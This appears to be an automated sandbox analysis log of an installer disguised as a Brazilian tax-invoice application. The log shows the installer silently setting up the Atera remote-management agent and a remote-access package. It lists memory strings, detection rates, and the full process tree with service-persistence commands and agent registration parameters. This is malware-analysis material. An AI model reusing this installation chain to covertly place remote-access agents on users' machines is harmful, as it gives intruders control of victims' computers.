                                Source: AgentPackageMonitoring.exe, 00000023.00000002.2090670816.000001F71D50F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE IF NOT EXISTS AlertedEvents_V2 (Id INTEGER PRIMARY KEY, Timestamp BIGINT NOT NULL, LogName TEXT NOT NULL, Severity INTEGER NOT NULL, RecordId BIGINT NOT NULL, EventId BIGINT NOT NULL, Source TEXT NOT NULL, Message TEXT NULL);p
                                Source: AgentPackageMonitoring.exe, 0000003C.00000002.2695077269.0000029E21F68000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: INSERT INTO ThresholdDuration (Identifier,Severity,Timestamp) Values (@identifier, @severity, @timestamp) ON CONFLICT (Identifier) DO UPDATE SET Severity = excluded.Severity, Timestamp = excluded.Timestamp;@
                                Source: AgentPackageMonitoring.exe, 00000023.00000000.2047773130.000001F71C982000.00000002.00000001.01000000.0000001D.sdmp, AgentPackageMonitoring.exe, 0000003C.00000002.2695077269.0000029E21F68000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: INSERT INTO ThresholdDuration (Identifier,Severity,Timestamp) Values (@identifier, @severity, @timestamp) ON CONFLICT (Identifier) DO UPDATE SET Severity = excluded.Severity, Timestamp = excluded.Timestamp;
                                Source: AgentPackageMonitoring.exe, 00000023.00000000.2047773130.000001F71C982000.00000002.00000001.01000000.0000001D.sdmpBinary or memory string: INSERT INTO [AlertsSent] (Timestamp, Alerts) VALUES (@timestamp, @alerts);kExecuteScriptAsync SystemTools Start scriptGuid : {0}Wrunscriptguid {0} 10 W10= disableSendResult
                                Source: AgentPackageMonitoring.exe, 0000003C.00000002.2695077269.0000029E22003000.00000004.00000800.00020000.00000000.sdmp, AgentPackageMonitoring.exe, 0000003C.00000002.2695077269.0000029E21F68000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: INSERT INTO Statistics(Name, Timestamp, Value) Values (@name, @timestamp, @value);
                                Source: AgentPackageMonitoring.exe, 00000023.00000002.2090670816.000001F71D50F000.00000004.00000800.00020000.00000000.sdmp, AgentPackageMonitoring.exe, 0000003C.00000002.2695077269.0000029E21DAA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE IF NOT EXISTS AlertedEvents_V2 (Id INTEGER PRIMARY KEY, Timestamp BIGINT NOT NULL, LogName TEXT NOT NULL, Severity INTEGER NOT NULL, RecordId BIGINT NOT NULL, EventId BIGINT NOT NULL, Source TEXT NOT NULL, Message TEXT NULL); CREATE INDEX IF NOT EXISTS idx_AlertedEvents_V2_Timestamp ON AlertedEvents_V2 (Timestamp); CREATE INDEX IF NOT EXISTS idx_AlertedEvents_V2_LogName ON AlertedEvents_V2 (LogName);
                                Source: AgentPackageMonitoring.exe, 00000023.00000000.2047773130.000001F71C982000.00000002.00000001.01000000.0000001D.sdmp, AgentPackageMonitoring.exe, 00000023.00000002.2090670816.000001F71D50F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE IF NOT EXISTS StatisticsSendTime (Id INTEGER PRIMARY KEY,Timestamp BIGINT NOT NULL);
                                Source: AgentPackageMonitoring.exe, 00000023.00000000.2047773130.000001F71C982000.00000002.00000001.01000000.0000001D.sdmpBinary or memory string: INSERT INTO Statistics(Name, Timestamp, Value) Values (@name, @timestamp, @value);%StatisticsSendTime
                                Source: AgentPackageMonitoring.exe, 00000023.00000002.2090670816.000001F71D50F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE IF NOT EXISTS Statistics (Id INTEGER PRIMARY KEY,Name TEXT NOT NULL,Timestamp BIGINT NOT NULL,Value TEXT NOT NULL);@
                                Source: AgentPackageMonitoring.exe, AgentPackageMonitoring.exe, 00000023.00000002.2166826373.00007FFDEE53A000.00000002.00000001.01000000.0000001E.sdmpBinary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
                                Source: AgentPackageMonitoring.exe, 00000023.00000000.2047773130.000001F71C982000.00000002.00000001.01000000.0000001D.sdmp, AgentPackageMonitoring.exe, 00000023.00000002.2090670816.000001F71D50F000.00000004.00000800.00020000.00000000.sdmp, AgentPackageMonitoring.exe, 0000003C.00000002.2695077269.0000029E21DAA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE IF NOT EXISTS ThresholdDuration (Id INTEGER PRIMARY KEY,Identifier TEXT NOT NULL,Severity TEXT NOT NULL,Timestamp BIGINT NOT NULL); CREATE UNIQUE INDEX IF NOT EXISTS idx_ThresholdDuration_Identifier ON ThresholdDuration (Identifier);
                                Source: AgentPackageMonitoring.exe, 00000023.00000002.2090670816.000001F71D50F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE IF NOT EXISTS ThresholdsProfiles (Id INTEGER NOT NULL PRIMARY KEY,IsActive BOOLEAN NOT NULL,Timestamp BIGINT NOT NULL,Name TEXT NOT NULL,Thresholds TEXT NOT NULL); CREATE INDEX IF NOT EXISTS idx_ThresholdsProfiles_Timestamp ON ThresholdsProfiles (Timestamp);@
                                Source: AgentPackageMonitoring.exe, 00000023.00000000.2047773130.000001F71C982000.00000002.00000001.01000000.0000001D.sdmp, AgentPackageMonitoring.exe, 00000023.00000002.2090670816.000001F71D50F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE IF NOT EXISTS Stub (Id INTEGER PRIMARY KEY, Timestamp BIGINT NOT NULL);
                                Source: AgentPackageMonitoring.exe, 00000023.00000002.2090670816.000001F71D50F000.00000004.00000800.00020000.00000000.sdmp, AgentPackageMonitoring.exe, 0000003C.00000002.2695077269.0000029E21DAA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE IF NOT EXISTS Statistics (Id INTEGER PRIMARY KEY,Name TEXT NOT NULL,Timestamp BIGINT NOT NULL,Value TEXT NOT NULL);
                                Source: AgentPackageMonitoring.exe, 00000023.00000002.2130001397.000001F736A95000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE IF NOT EXISTS [AlertsSent] (Id INTEGER NOT NULL PRIMARY KEY, Timestamp BIGINT NOT NULL, Alerts TEXT NOT NULL);RY
                                Source: AgentPackageMonitoring.exe, 0000003C.00000002.2695077269.0000029E2227C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: INSERT INTO StatisticsSendTime (Timestamp) Values (@timestamp);
                                Source: AgentPackageMonitoring.exe, 00000023.00000002.2090670816.000001F71D50F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE IF NOT EXISTS AlertedEvents_V2 (Id INTEGER PRIMARY KEY, Timestamp BIGINT NOT NULL, LogName TEXT NOT NULL, Severity INTEGER NOT NULL, RecordId BIGINT NOT NULL, EventId BIGINT NOT NULL, Source TEXT NOT NULL, Message TEXT NULL); CREATE INDEX IF NOT EXISTS idx_AlertedEvents_V2_Timestamp ON AlertedEvents_V2 (Timestamp); CREATE INDEX IF NOT EXISTS idx_AlertedEvents_V2_LogName ON AlertedEvents_V2 (LogName);@
                                Source: AgentPackageMonitoring.exe, 0000003C.00000002.2695077269.0000029E22130000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: INSERT INTO [AlertsSent] (Timestamp, Alerts) VALUES (@timestamp, @alerts);
                                Source: AgentPackageMonitoring.exe, 00000023.00000002.2166826373.00007FFDEE53A000.00000002.00000001.01000000.0000001E.sdmpBinary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
                                Source: AgentPackageMonitoring.exe, AgentPackageMonitoring.exe, 00000023.00000002.2166826373.00007FFDEE53A000.00000002.00000001.01000000.0000001E.sdmpBinary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
                                Source: AgentPackageMonitoring.exe, AgentPackageMonitoring.exe, 00000023.00000002.2166826373.00007FFDEE53A000.00000002.00000001.01000000.0000001E.sdmpBinary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
                                Source: AgentPackageMonitoring.exe, 00000023.00000000.2047773130.000001F71C982000.00000002.00000001.01000000.0000001D.sdmp, AgentPackageMonitoring.exe, 0000003C.00000002.2695077269.0000029E2219C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SELECT Timestamp FROM StatisticsSendTime ORDER BY Timestamp DESC LIMIT 1;
                                Source: AgentPackageMonitoring.exe, 00000023.00000000.2047773130.000001F71C982000.00000002.00000001.01000000.0000001D.sdmpBinary or memory string: CREATE TABLE IF NOT EXISTS [AlertsSent] (Id INTEGER NOT NULL PRIMARY KEY, Timestamp BIGINT NOT NULL, Alerts TEXT NOT NULL);sSELECT MAX([Timestamp]) AS [TimeStamp] FROM [AlertsSent];
                                Source: AgentPackageMonitoring.exe, 0000003C.00000002.2788198882.0000029E3B3C5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE Stub (Id INTEGER PRIMARY KEY, Timestamp BIGINT NOT NULL)C<;
                                Source: AgentPackageMonitoring.exe, AgentPackageMonitoring.exe, 00000023.00000002.2166826373.00007FFDEE53A000.00000002.00000001.01000000.0000001E.sdmpBinary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
                                Source: AgentPackageMonitoring.exe, 0000003C.00000002.2695077269.0000029E2219C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SELECT Id, Name, Timestamp, Value FROM Statistics;
                                Source: AgentPackageMonitoring.exe, 00000023.00000002.2090670816.000001F71D50F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE IF NOT EXISTS ThresholdsProfiles (Id INTEGER NOT NULL PRIMARY KEY,IsActive BOOLEAN NOT NULL,Timestamp BIGINT NOT NULL,Name TEXT NOT NULL,Thresholds TEXT NOT NULL);p
                                Source: AgentPackageMonitoring.exe, 00000023.00000002.2090670816.000001F71D50F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE IF NOT EXISTS ThresholdDuration (Id INTEGER PRIMARY KEY,Identifier TEXT NOT NULL,Severity TEXT NOT NULL,Timestamp BIGINT NOT NULL); CREATE UNIQUE INDEX IF NOT EXISTS idx_ThresholdDuration_Identifier ON ThresholdDuration (Identifier);@
                                Source: AgentPackageMonitoring.exe, 00000023.00000000.2047773130.000001F71C982000.00000002.00000001.01000000.0000001D.sdmpBinary or memory string: SELECT [Id], [Alerts], [Timestamp] FROM [AlertsSent] ORDER BY [Timestamp] DESC LIMIT 1;
                                Source: AgentPackageMonitoring.exe, 00000023.00000000.2047773130.000001F71C982000.00000002.00000001.01000000.0000001D.sdmpBinary or memory string: CREATE TABLE IF NOT EXISTS Statistics (Id INTEGER PRIMARY KEY,Name TEXT NOT NULL,Timestamp BIGINT NOT NULL,Value TEXT NOT NULL);/DELETE FROM Statistics;eSELECT Id, Name, Timestamp, Value FROM Statistics;
                                Source: AgentPackageMonitoring.exe, 00000023.00000002.2130001397.000001F736A95000.00000004.00000020.00020000.00000000.sdmp, AgentPackageMonitoring.exe, 00000023.00000002.2090670816.000001F71D50F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE IF NOT EXISTS [AlertsSent] (Id INTEGER NOT NULL PRIMARY KEY, Timestamp BIGINT NOT NULL, Alerts TEXT NOT NULL);
                                Source: AgentPackageMonitoring.exe, 00000023.00000000.2047773130.000001F71C982000.00000002.00000001.01000000.0000001D.sdmp, AgentPackageMonitoring.exe, 00000023.00000002.2090670816.000001F71D50F000.00000004.00000800.00020000.00000000.sdmp, AgentPackageMonitoring.exe, 0000003C.00000002.2695077269.0000029E21DAA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE IF NOT EXISTS ThresholdsProfiles (Id INTEGER NOT NULL PRIMARY KEY,IsActive BOOLEAN NOT NULL,Timestamp BIGINT NOT NULL,Name TEXT NOT NULL,Thresholds TEXT NOT NULL); CREATE INDEX IF NOT EXISTS idx_ThresholdsProfiles_Timestamp ON ThresholdsProfiles (Timestamp);
                                Source: AgentPackageMonitoring.exe, AgentPackageMonitoring.exe, 00000023.00000002.2166826373.00007FFDEE53A000.00000002.00000001.01000000.0000001E.sdmpBinary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
                                Source: AgentPackageMonitoring.exe, 00000023.00000002.2090670816.000001F71D9F2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: INSERT INTO ThresholdsProfiles (IsActive,Timestamp,Name,Thresholds) Values (@isActive,@timestamp,@name,@thresholds); DELETE FROM ThresholdsProfiles WHERE Timestamp < @timeToDelete;
                                Source: AgentPackageMonitoring.exe, 00000023.00000002.2090670816.000001F71D9F2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: INSERT INTO ThresholdsProfiles (IsActive,Timestamp,Name,Thresholds) Values (@isActive,@timestamp,@name,@thresholds); DELETE FROM ThresholdsProfiles WHERE Timestamp < @timeToDelete;@
                                Source: AgentPackageMonitoring.exe, 0000003C.00000002.2695077269.0000029E22003000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SELECT MAX([Timestamp]) AS [TimeStamp] FROM [AlertsSent];
                                Source: AgentPackageMonitoring.exe, AgentPackageMonitoring.exe, 00000023.00000002.2166826373.00007FFDEE53A000.00000002.00000001.01000000.0000001E.sdmpBinary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
                                Source: AgentPackageMonitoring.exe, 00000023.00000000.2047773130.000001F71C982000.00000002.00000001.01000000.0000001D.sdmpBinary or memory string: select Name from Win32_PerfFormattedData_Tcpip_NetworkInterface!DataStatsEnabled9InboundBandwidthStatsEnabled;OutboundBandwidthStatsEnabled
                                Source: AgentPackageMonitoring.exe, 00000023.00000000.2047773130.000001F71C982000.00000002.00000001.01000000.0000001D.sdmp, AgentPackageMonitoring.exe, 0000003C.00000002.2695077269.0000029E223ED000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SELECT Id, IsActive, Timestamp, Name, Thresholds FROM ThresholdsProfiles ORDER BY Timestamp DESC LIMIT 1;
                                Source: AgentPackageMonitoring.exe, 0000003C.00000002.2695077269.0000029E21F68000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SELECT Identifier, Severity, Timestamp FROM ThresholdDuration WHERE Identifier = @id;
                                Source: APLICATIVO-WINDOWS-NOTA-FISCAL.msiStatic file information: TRID: Microsoft Windows Installer (60509/1) 57.88%
                                Source: APLICATIVO-WINDOWS-NOTA-FISCAL.msiVirustotal: Detection: 18%
                                Source: APLICATIVO-WINDOWS-NOTA-FISCAL.msiReversingLabs: Detection: 23%
                                Source: unknownProcess created: C:\Windows\System32\msiexec.exe "C:\Windows\System32\msiexec.exe" /i "C:\Users\user\Desktop\APLICATIVO-WINDOWS-NOTA-FISCAL.msi"
                                Source: unknownProcess created: C:\Windows\System32\msiexec.exe C:\Windows\system32\msiexec.exe /V
                                Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding BF843BCBC9EBED5C34216282DB92822D
                                Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Windows\Installer\MSI2D79.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_6893046 2 AlphaControlAgentInstallation!AlphaControlAgentInstallation.CustomActions.GenerateAgentId
                                Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Windows\Installer\MSI2FBD.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_6893546 6 AlphaControlAgentInstallation!AlphaControlAgentInstallation.CustomActions.ReportMsiStart
                                Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Windows\Installer\MSI3FBB.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_6897625 10 AlphaControlAgentInstallation!AlphaControlAgentInstallation.CustomActions.ShouldContinueInstallation
                                Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding 3A3D5EBA34EB9624AE48E4F4D08FECDB E Global\MSI0000
                                Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\net.exe "NET" STOP AteraAgent
                                Source: C:\Windows\SysWOW64\net.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Source: C:\Windows\SysWOW64\net.exeProcess created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 STOP AteraAgent
                                Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\taskkill.exe "TaskKill.exe" /f /im AteraAgent.exe
                                Source: C:\Windows\SysWOW64\taskkill.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Source: C:\Windows\System32\msiexec.exeProcess created: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe "C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe" /i /IntegratorLogin="contato@fazendadoscordeiros.com.br" /CompanyId="1" /IntegratorLoginUI="" /CompanyIdUI="" /FolderId="" /AccountId="001Q300000P2oAPIAZ" /AgentId="52187e48-563c-468d-9785-3542f81fb412"
                                Source: unknownProcess created: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe "C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe"
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess created: C:\Windows\System32\sc.exe "C:\Windows\System32\sc.exe" failure AteraAgent reset= 600 actions= restart/25000
                                Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Windows\Installer\MSI56F2.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_6903546 32 AlphaControlAgentInstallation!AlphaControlAgentInstallation.CustomActions.ReportMsiEnd
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess created: C:\Program Files\Windows Defender\MpCmdRun.exe "C:\Program Files\Windows Defender\mpcmdrun.exe" -wdenable
                                Source: C:\Program Files\Windows Defender\MpCmdRun.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe "C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe" 52187e48-563c-468d-9785-3542f81fb412 "cb3e2cb9-55c1-438a-8389-94c341441cc1" agent-api.atera.com/Production 443 or8ixLi90Mf "minimalIdentification" 001Q300000P2oAPIAZ
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe "C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe" 52187e48-563c-468d-9785-3542f81fb412 "b007e062-743d-47e1-a870-a586f83a0d8d" agent-api.atera.com/Production 443 or8ixLi90Mf "minimalIdentification" 001Q300000P2oAPIAZ
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe "C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe" 52187e48-563c-468d-9785-3542f81fb412 "8786f2fa-f7ec-48f3-845c-8cd509c85e9f" agent-api.atera.com/Production 443 or8ixLi90Mf "identified" 001Q300000P2oAPIAZ
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Source: unknownProcess created: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe "C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe"
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess created: C:\Windows\System32\sc.exe "C:\Windows\System32\sc.exe" failure AteraAgent reset= 600 actions= restart/25000
                                Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe "C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe" 52187e48-563c-468d-9785-3542f81fb412 "1b6d15b4-846f-4811-aa62-e314f5d5945b" agent-api.atera.com/Production 443 or8ixLi90Mf "generalinfo fromGui" 001Q300000P2oAPIAZ
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -NoProfile -Command " ################################################################################################ # Windows 11 Compatibility Check Script # ################################################################################################ # Compatibility flag $IsCompatible = $true # Check if current OS is Windows 10 $OSVersion = (Get-CimInstance -Class Win32_OperatingSystem).Caption if (-not $OSVersion.Contains('Windows 10')) { return } # Architecture x64 $Arch = (Get-CimInstance -Class CIM_ComputerSystem).SystemType $ArchValue = 'x64-based PC' if ($Arch -ne $ArchValue) { $IsCompatible = $false } # Screen Resolution $ScreenInfo = (Get-CimInstance -ClassName Win32_VideoController).CurrentVerticalResolution $ValueMin = 720 if ($ScreenInfo -le $ValueMin) { $IsCompatible = $false } # CPU composition $Core = (Get-CimInstance -Class CIM_Processor | Select-Object *).NumberOfCores $CoreValue = 2 $Frequency = (Get-CimInstance -Class CIM_Processor | Select-Object *).MaxClockSpeed $FrequencyValue = 1000 if (-not (($Core -ge $CoreValue) -and ($Frequency -ge $FrequencyValue))) { $IsCompatible = $false } # TPM $TPM2 = $false if ((Get-Tpm).ManufacturerVersionFull20) { $TPM2 = -not (Get-Tpm).ManufacturerVersionFull20.Contains('not supported') } if ($TPM2 -contains $false) { $IsCompatible = $false } # Secure Boot $SecureBoot = Confirm-SecureBootUEFI if ($SecureBoot -ne $true) { $IsCompatible = $false } # RAM available $Memory = (Get-CimInstance -Class CIM_ComputerSystem).TotalPhysicalMemory $SetMinMemory = 4294967296 if ($Memory -lt $SetMinMemory) { $IsCompatible = $false } # Storage available $ListDisk = Get-CimInstance -Class Win32_LogicalDisk | Where-Object { $_.DriveType -eq '3' } $SetMinSizeLimit = 64GB $DiskCompatible = $false foreach ($Disk in $ListDisk) { if ($Disk.FreeSpace -ge $SetMinSizeLimit) { $DiskCompatible = $true } } if (-not $DiskCompatible) { $IsCompatible = $false } # Output final result $IsCompatible "
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe "C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe" 52187e48-563c-468d-9785-3542f81fb412 "1aa92b0c-e5fb-4470-8edf-86a7f92c710d" agent-api.atera.com/Production 443 or8ixLi90Mf "install eyJSbW1Db2RlIjoiaFpDREZQaEs3NW1KIiwiUmVxdWVzdFBlcm1pc3Npb25PcHRpb24iOm51bGwsIlJlcXVpcmVQYXNzd29yZE9wdGlvbiI6bnVsbCwiUGFzc3dvcmQiOm51bGx9" 001Q300000P2oAPIAZ
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exe "C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exe" 52187e48-563c-468d-9785-3542f81fb412 "69e8737b-1308-4d43-800a-39f09304f118" agent-api.atera.com/Production 443 or8ixLi90Mf "syncprofile" 001Q300000P2oAPIAZ
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c cscript "C:\Program Files (x86)\Microsoft Office\Office16\ospp.vbs" /dstatus
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cscript.exe cscript "C:\Program Files (x86)\Microsoft Office\Office16\ospp.vbs" /dstatus
                                Source: unknownProcess created: C:\Windows\System32\sppsvc.exe C:\Windows\system32\sppsvc.exe
                                Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k smphost
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\AgentPackageUpgradeAgent.exe "C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\AgentPackageUpgradeAgent.exe" 52187e48-563c-468d-9785-3542f81fb412 "e82d88f8-5758-4c6f-9f7b-8b023b21ca56" agent-api.atera.com/Production 443 or8ixLi90Mf "checkforupdates" 001Q300000P2oAPIAZ
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\AgentPackageUpgradeAgent.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exe "C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exe" 52187e48-563c-468d-9785-3542f81fb412 "c4c25269-0a4b-4daf-adc0-e2db93d9b9dd" agent-api.atera.com/Production 443 or8ixLi90Mf "maintain" 001Q300000P2oAPIAZ
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Source: unknownProcess created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\AgentPackageUpgradeAgent.exe "C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\AgentPackageUpgradeAgent.exe" schedulerrun
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageInternalPoller\AgentPackageInternalPoller.exe "C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageInternalPoller\AgentPackageInternalPoller.exe" 52187e48-563c-468d-9785-3542f81fb412 "440dfd42-8399-4319-8ab9-c9695127bb3a" agent-api.atera.com/Production 443 or8ixLi90Mf "pollAll" 001Q300000P2oAPIAZ
